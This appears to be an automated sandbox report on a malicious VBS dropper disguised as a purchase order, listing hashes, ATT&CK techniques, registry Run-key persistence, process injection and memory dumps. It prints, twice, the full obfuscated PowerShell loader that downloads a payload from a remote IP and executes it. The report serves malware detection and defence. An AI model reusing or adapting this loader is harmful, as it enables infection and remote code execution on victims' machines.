a3483bf7a148434868b34bae2923006067f9e5e3ef2a2f62efaf6a32b93cddfc

Analysis

max time kernel
148s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
18/04/2024, 19:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO_La-Tanerie04180240124.vbs
Size

187KB
MD5

2ea61e83ee687b29c058279893e1df8c
SHA1

0c6fc46e4a0bf4c62a5cd2e263313e82f2977a50
SHA256

a3483bf7a148434868b34bae2923006067f9e5e3ef2a2f62efaf6a32b93cddfc
SHA512

a810bd13d522775d4d9c3ef3e6775da5cc34db90d4826da9c96fb37c1d84dd37ad5eb84fc2c3095b3a9a065fbbd54a4892f96d867f879de14708d4f409f82ca8
SSDEEP

3072:2vU8jq6KK8ccABOwbDS2y2zJETxUuoHh38zH/O4SCvewvB7wrsCREBJo5mFSar+c:J6R8ccABOwbDA2zJETxVu1iH/GsW3EBB

Score

8^/10

persistence

Malware Config

Signatures

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-776854024-226333264-2052258302-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	AtBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\KHGLYHSXLZM = "C:\\Program Files (x86)\\windows mail\\wab.exe"	AtBroker.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	2524	WScript.exe
25	4652	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3428	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4092	powershell.exe
3428	wab.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4092 set thread context of 3428	4092	powershell.exe	100
PID 3428 set thread context of 3520	3428	wab.exe	56
PID 3428 set thread context of 3564	3428	wab.exe	101
PID 3564 set thread context of 3520	3564	AtBroker.exe	56

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
4652	powershell.exe
4652	powershell.exe
4092	powershell.exe
4092	powershell.exe
4092	powershell.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3428	wab.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe
3564	AtBroker.exe

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
4092	powershell.exe
4092	powershell.exe
4092	powershell.exe
3428	wab.exe
3520	Explorer.EXE
3520	Explorer.EXE
3564	AtBroker.exe
3564	AtBroker.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2524 wrote to memory of 4652	2524	WScript.exe	89
PID 2524 wrote to memory of 4652	2524	WScript.exe	89
PID 4652 wrote to memory of 2964	4652	powershell.exe	92
PID 4652 wrote to memory of 2964	4652	powershell.exe	92
PID 4652 wrote to memory of 4092	4652	powershell.exe	94
PID 4652 wrote to memory of 4092	4652	powershell.exe	94
PID 4652 wrote to memory of 4092	4652	powershell.exe	94
PID 4092 wrote to memory of 1512	4092	powershell.exe	95
PID 4092 wrote to memory of 1512	4092	powershell.exe	95
PID 4092 wrote to memory of 1512	4092	powershell.exe	95
PID 4092 wrote to memory of 4868	4092	powershell.exe	98
PID 4092 wrote to memory of 4868	4092	powershell.exe	98
PID 4092 wrote to memory of 4868	4092	powershell.exe	98
PID 4092 wrote to memory of 2896	4092	powershell.exe	99
PID 4092 wrote to memory of 2896	4092	powershell.exe	99
PID 4092 wrote to memory of 2896	4092	powershell.exe	99
PID 4092 wrote to memory of 3428	4092	powershell.exe	100
PID 4092 wrote to memory of 3428	4092	powershell.exe	100
PID 4092 wrote to memory of 3428	4092	powershell.exe	100
PID 4092 wrote to memory of 3428	4092	powershell.exe	100
PID 4092 wrote to memory of 3428	4092	powershell.exe	100
PID 3520 wrote to memory of 3564	3520	Explorer.EXE	101
PID 3520 wrote to memory of 3564	3520	Explorer.EXE	101
PID 3520 wrote to memory of 3564	3520	Explorer.EXE	101

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3520
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO_La-Tanerie04180240124.vbs"
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Projektforlb = 1;$Zenithward='Substrin';$Zenithward+='g';Function Recoverability($Prvekrendes){$Afproevning=$Prvekrendes.Length-$Projektforlb;For($Automatpiloten=1; $Automatpiloten -lt $Afproevning; $Automatpiloten+=(2)){$Overgraduated+=$Prvekrendes.$Zenithward.Invoke($Automatpiloten, $Projektforlb);}$Overgraduated;}function Prespontaneously($Fstningen){. ($Herreekviperingshandlere) ($Fstningen);}$Smutchiest=Recoverability 'UMFofzCislBlLa./ 5,.,0O P( WCiUn,d.o wUsA ,N TP K1.0I.K0.; WUi n.6V4S;S DxN6.4 ;Q .rPvQ: 1W2 1,. 0 )B SG eDcTkGoS/T2.0C1 0S0.1.0A1 BF iOrAeUf oPxR/B1.2,1U.B0 ';$agrestian=Recoverability 'AU sFe rH-KAKg eCnItM ';$Slvsindets=Recoverability ' hBtst.pI: /./P8Z7..K1 2 1,..1,0T5D.A1 6,3,/,TTapkTt.r eugSuJl,eVrFi n gSs aMfEtFa,l eBrO. d w p. ';$Tersely=Recoverability ',>, ';$Herreekviperingshandlere=Recoverability ' i eMx ';$supercilia = Recoverability 'Ce cFh o %MappTpWdDaBt aW%S\FSFuMk.k,eSrFrSoBe rT.TTDe,t. ,& & ,e cCh oB $F ';Prespontaneously (Recoverability 'S$ag lTo bSaSl :SE tMe r n a lSi tay,=p( c.m dK O/.c, ,$Gs uFp e rFc iRlLiUa.) ');Prespontaneously (Recoverability ' $Cg.l.o bMaRl :RL.a.g.eOtus.=C$wSLl v sFiEn d,eSt,s .,sEpKlRi t ( $TT e,r sFeyl yR)d ');$Slvsindets=$Lagets[0];Prespontaneously (Recoverability 'S$ g lBo bSa l :AA rPg eJn tCiPt e =NN.e.w - O,bMjReTcCt DSSyVs t,ePmS. N edtQ. WUe,bMC lSiHeSn t ');Prespontaneously (Recoverability ',$HA rFg eDn,t,iFtBeE.UH eFa,dCeHrKsG[.$,aSg,rMeSsetQi.aGn ]T=S$OSpmHu,tTcFh.i eHsFt ');$unwedged=Recoverability ' A rsgReDnVtZi.t eH.RD oRwHnGl.oCa.d F,i l eS(S$.S,l v.sRi,n dSeWtNs,,.$ TBrRaPnNsApFa l,a.tTiDn.e.) ';$unwedged=$Eternality[1]+$unwedged;$Transpalatine=$Eternality[0];Prespontaneously (Recoverability 'U$ g.l oTb a.lG:,O,fFf iMc eorpe,nmsD= (,T,e sStL-tPGahtDh ,$STSr,aSn,sApEa l,aCt ifnte )H ');while (!$Officerens) {Prespontaneously (Recoverability ',$,gBlSoAbTaUlE:.F.a i r.y.=C$ tOr u.es ') ;Prespontaneously $unwedged;Prespontaneously (Recoverability ' SAt a rBtR-PS.l eUe p O4 ');Prespontaneously (Recoverability ' $.g lPoEbpaKl :.O fMfOiucDe rVe,n.sA=H(NT e s tF- PPattBh N$STHrTaSn.s p,aPl.a teiPnveT). ') ;Prespontaneously (Recoverability ' $CgWl,ovbOa.lO:,GaaDuRsHsZbSr,e.dPd e,rBn.eAsH=,$Og,l o b asl :,sHtLr.a.nHgTl,eShPoSl.d.+J+.% $ L,aMgHe,t,sO.Sc,o uJnPt. ') ;$Slvsindets=$Lagets[$Gaussbreddernes];}Prespontaneously (Recoverability ' $Bg l.oRbGaGlP: S tAy n e b=P KGPeUtW- CBoSn,tTeUnNt, $ T,rFatnVs,pSa l a.tkiKnFe ');Prespontaneously (Recoverability '.$Ag lSo bIaSl :FC e n tSr a lUsky,g,e hfuIs eLnDe.sT B=S [ASKy.s tTeSmE..CAoVnBv eKr,tV]E:,:OF.r o m BBa,sReR6 4.SAt r,iUnSg (.$RSSt y nMe )S ');Prespontaneously (Recoverability ',$.g,l oUbCaGl :MSCc,htn oCoRk s, T=S C[RS.y sNt.e m .,TAePxbt.. E n,cPo d,i nPg ] :H: A SJC,ITIS.BG eRtaSptSr iUn gS( $FC ePn tFrTa l s yBgRe h uMs e n e sb). ');Prespontaneously (Recoverability ' $Cg,l,o b.a,lP: LRyMmUpWhUoFc.y tUo.t iMc,=.$ SFc h nMo.o.k sU.Vs u.b sSt,rtiBn.gS(G3.2b1.8D9R0 ,,2U5I0H0 8C) ');Prespontaneously $Lymphocytotic;"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4652
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sukkerroer.Tet && echo $"
      4⤵
      PID:2964
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Projektforlb = 1;$Zenithward='Substrin';$Zenithward+='g';Function Recoverability($Prvekrendes){$Afproevning=$Prvekrendes.Length-$Projektforlb;For($Automatpiloten=1; $Automatpiloten -lt $Afproevning; $Automatpiloten+=(2)){$Overgraduated+=$Prvekrendes.$Zenithward.Invoke($Automatpiloten, $Projektforlb);}$Overgraduated;}function Prespontaneously($Fstningen){. ($Herreekviperingshandlere) ($Fstningen);}$Smutchiest=Recoverability 'UMFofzCislBlLa./ 5,.,0O P( WCiUn,d.o wUsA ,N TP K1.0I.K0.; WUi n.6V4S;S DxN6.4 ;Q .rPvQ: 1W2 1,. 0 )B SG eDcTkGoS/T2.0C1 0S0.1.0A1 BF iOrAeUf oPxR/B1.2,1U.B0 ';$agrestian=Recoverability 'AU sFe rH-KAKg eCnItM ';$Slvsindets=Recoverability ' hBtst.pI: /./P8Z7..K1 2 1,..1,0T5D.A1 6,3,/,TTapkTt.r eugSuJl,eVrFi n gSs aMfEtFa,l eBrO. d w p. ';$Tersely=Recoverability ',>, ';$Herreekviperingshandlere=Recoverability ' i eMx ';$supercilia = Recoverability 'Ce cFh o %MappTpWdDaBt aW%S\FSFuMk.k,eSrFrSoBe rT.TTDe,t. ,& & ,e cCh oB $F ';Prespontaneously (Recoverability 'S$ag lTo bSaSl :SE tMe r n a lSi tay,=p( c.m dK O/.c, ,$Gs uFp e rFc iRlLiUa.) ');Prespontaneously (Recoverability ' $Cg.l.o bMaRl :RL.a.g.eOtus.=C$wSLl v sFiEn d,eSt,s .,sEpKlRi t ( $TT e,r sFeyl yR)d ');$Slvsindets=$Lagets[0];Prespontaneously (Recoverability 'S$ g lBo bSa l :AA rPg eJn tCiPt e =NN.e.w - O,bMjReTcCt DSSyVs t,ePmS. N edtQ. WUe,bMC lSiHeSn t ');Prespontaneously (Recoverability ',$HA rFg eDn,t,iFtBeE.UH eFa,dCeHrKsG[.$,aSg,rMeSsetQi.aGn ]T=S$OSpmHu,tTcFh.i eHsFt ');$unwedged=Recoverability ' A rsgReDnVtZi.t eH.RD oRwHnGl.oCa.d F,i l eS(S$.S,l v.sRi,n dSeWtNs,,.$ TBrRaPnNsApFa l,a.tTiDn.e.) ';$unwedged=$Eternality[1]+$unwedged;$Transpalatine=$Eternality[0];Prespontaneously (Recoverability 'U$ g.l oTb a.lG:,O,fFf iMc eorpe,nmsD= (,T,e sStL-tPGahtDh ,$STSr,aSn,sApEa l,aCt ifnte )H ');while (!$Officerens) {Prespontaneously (Recoverability ',$,gBlSoAbTaUlE:.F.a i r.y.=C$ tOr u.es ') ;Prespontaneously $unwedged;Prespontaneously (Recoverability ' SAt a rBtR-PS.l eUe p O4 ');Prespontaneously (Recoverability ' $.g lPoEbpaKl :.O fMfOiucDe rVe,n.sA=H(NT e s tF- PPattBh N$STHrTaSn.s p,aPl.a teiPnveT). ') ;Prespontaneously (Recoverability ' $CgWl,ovbOa.lO:,GaaDuRsHsZbSr,e.dPd e,rBn.eAsH=,$Og,l o b asl :,sHtLr.a.nHgTl,eShPoSl.d.+J+.% $ L,aMgHe,t,sO.Sc,o uJnPt. ') ;$Slvsindets=$Lagets[$Gaussbreddernes];}Prespontaneously (Recoverability ' $Bg l.oRbGaGlP: S tAy n e b=P KGPeUtW- CBoSn,tTeUnNt, $ T,rFatnVs,pSa l a.tkiKnFe ');Prespontaneously (Recoverability '.$Ag lSo bIaSl :FC e n tSr a lUsky,g,e hfuIs eLnDe.sT B=S [ASKy.s tTeSmE..CAoVnBv eKr,tV]E:,:OF.r o m BBa,sReR6 4.SAt r,iUnSg (.$RSSt y nMe )S ');Prespontaneously (Recoverability ',$.g,l oUbCaGl :MSCc,htn oCoRk s, T=S C[RS.y sNt.e m .,TAePxbt.. E n,cPo d,i nPg ] :H: A SJC,ITIS.BG eRtaSptSr iUn gS( $FC ePn tFrTa l s yBgRe h uMs e n e sb). ');Prespontaneously (Recoverability ' $Cg,l,o b.a,lP: LRyMmUpWhUoFc.y tUo.t iMc,=.$ SFc h nMo.o.k sU.Vs u.b sSt,rtiBn.gS(G3.2b1.8D9R0 ,,2U5I0H0 8C) ');Prespontaneously $Lymphocytotic;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4092
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sukkerroer.Tet && echo $"
        5⤵
        
        PID:1512
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        
        PID:4868
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        
        PID:2896
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3428
- C:\Windows\SysWOW64\AtBroker.exe
  "C:\Windows\SysWOW64\AtBroker.exe"
  2⤵
  - Adds policy Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fidrbw55.l0g.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Sukkerroer.Tet

Filesize
451KB

MD5
20a3bfc6ed1ce2abd176c7abffe0d815

SHA1
c08ac2fe2540df9063f25661db898865b3b189d1

SHA256
615247c375706fcfc9261502cd1b15ad30d9491913ae418d2e9f6723dce466b9

SHA512
ac141f428b4d71e19916f253821c2bcfffe420c57425f1114ccea3ef79a5ce00baf89d811bd740e687cd5ed7498cb6d99d0c7d091291aed1df48558094ea51df

Download Submit
memory/3428-67-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3428-79-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3428-58-0x0000000077378000-0x0000000077379000-memory.dmp

Filesize
4KB

Download
memory/3428-57-0x00000000772F1000-0x0000000077411000-memory.dmp

Filesize
1.1MB

Download
memory/3428-59-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3428-61-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3428-74-0x0000000021070000-0x0000000021093000-memory.dmp

Filesize
140KB

Download
memory/3428-65-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3428-66-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3428-73-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3428-68-0x00000000212A0000-0x00000000215EA000-memory.dmp

Filesize
3.3MB

Download
memory/3428-76-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3428-56-0x00000000772F1000-0x0000000077411000-memory.dmp

Filesize
1.1MB

Download
memory/3428-70-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3428-69-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3520-75-0x000000000C820000-0x000000000D766000-memory.dmp

Filesize
15.3MB

Download
memory/3520-83-0x000000000C820000-0x000000000D766000-memory.dmp

Filesize
15.3MB

Download
memory/3564-84-0x0000000000750000-0x0000000000790000-memory.dmp

Filesize
256KB

Download
memory/3564-77-0x0000000000750000-0x0000000000790000-memory.dmp

Filesize
256KB

Download
memory/3564-78-0x0000000000750000-0x0000000000790000-memory.dmp

Filesize
256KB

Download
memory/3564-80-0x0000000002920000-0x0000000002C6A000-memory.dmp

Filesize
3.3MB

Download
memory/3564-81-0x0000000000750000-0x0000000000790000-memory.dmp

Filesize
256KB

Download
memory/3564-82-0x0000000002770000-0x0000000002812000-memory.dmp

Filesize
648KB

Download
memory/3564-85-0x0000000002770000-0x0000000002812000-memory.dmp

Filesize
648KB

Download
memory/4092-27-0x0000000005F30000-0x0000000005F96000-memory.dmp

Filesize
408KB

Download
memory/4092-39-0x0000000006770000-0x00000000067BC000-memory.dmp

Filesize
304KB

Download
memory/4092-49-0x0000000008F60000-0x000000000D55B000-memory.dmp

Filesize
70.0MB

Download
memory/4092-51-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/4092-52-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/4092-53-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/4092-54-0x00000000772F1000-0x0000000077411000-memory.dmp

Filesize
1.1MB

Download
memory/4092-55-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/4092-47-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/4092-45-0x00000000089B0000-0x0000000008F54000-memory.dmp

Filesize
5.6MB

Download
memory/4092-44-0x0000000007970000-0x0000000007992000-memory.dmp

Filesize
136KB

Download
memory/4092-43-0x00000000079E0000-0x0000000007A76000-memory.dmp

Filesize
600KB

Download
memory/4092-60-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/4092-42-0x0000000006CC0000-0x0000000006CDA000-memory.dmp

Filesize
104KB

Download
memory/4092-19-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/4092-41-0x0000000007D80000-0x00000000083FA000-memory.dmp

Filesize
6.5MB

Download
memory/4092-40-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/4092-48-0x0000000007C60000-0x0000000007C61000-memory.dmp

Filesize
4KB

Download
memory/4092-38-0x0000000006740000-0x000000000675E000-memory.dmp

Filesize
120KB

Download
memory/4092-33-0x0000000005FA0000-0x00000000062F4000-memory.dmp

Filesize
3.3MB

Download
memory/4092-22-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/4092-26-0x0000000005870000-0x00000000058D6000-memory.dmp

Filesize
408KB

Download
memory/4092-25-0x00000000057D0000-0x00000000057F2000-memory.dmp

Filesize
136KB

Download
memory/4092-24-0x0000000005900000-0x0000000005F28000-memory.dmp

Filesize
6.2MB

Download
memory/4092-23-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/4092-20-0x0000000002D70000-0x0000000002DA6000-memory.dmp

Filesize
216KB

Download
memory/4652-21-0x00000204BAA40000-0x00000204BAA50000-memory.dmp

Filesize
64KB

Download
memory/4652-11-0x00000204BAA50000-0x00000204BAA72000-memory.dmp

Filesize
136KB

Download
memory/4652-64-0x00007FFEEAAB0000-0x00007FFEEB571000-memory.dmp

Filesize
10.8MB

Download
memory/4652-18-0x00000204BAA40000-0x00000204BAA50000-memory.dmp

Filesize
64KB

Download
memory/4652-17-0x00000204BAA40000-0x00000204BAA50000-memory.dmp

Filesize
64KB

Download
memory/4652-15-0x00007FFEEAAB0000-0x00007FFEEB571000-memory.dmp

Filesize
10.8MB

Download
memory/4652-13-0x00000204BAA40000-0x00000204BAA50000-memory.dmp

Filesize
64KB

Download
memory/4652-12-0x00007FFEEAAB0000-0x00007FFEEB571000-memory.dmp

Filesize
10.8MB

Download